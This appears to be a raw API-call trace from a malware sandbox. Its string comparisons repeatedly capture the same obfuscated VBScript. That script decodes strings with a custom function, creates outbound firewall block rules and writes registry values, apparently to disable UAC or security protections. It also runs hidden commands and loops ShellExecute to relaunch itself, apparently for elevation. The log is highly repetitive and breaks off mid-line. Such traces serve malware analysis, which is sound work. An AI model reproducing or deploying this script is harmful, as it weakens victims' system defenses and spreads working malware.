bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.350] wcsncmp (_String1="se\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.350] wcsncmp (_String1="e\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.350] wcsncmp (_String1="\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0226.350] wcsncmp (_String1="\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.350] wcsncmp (_String1="rules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 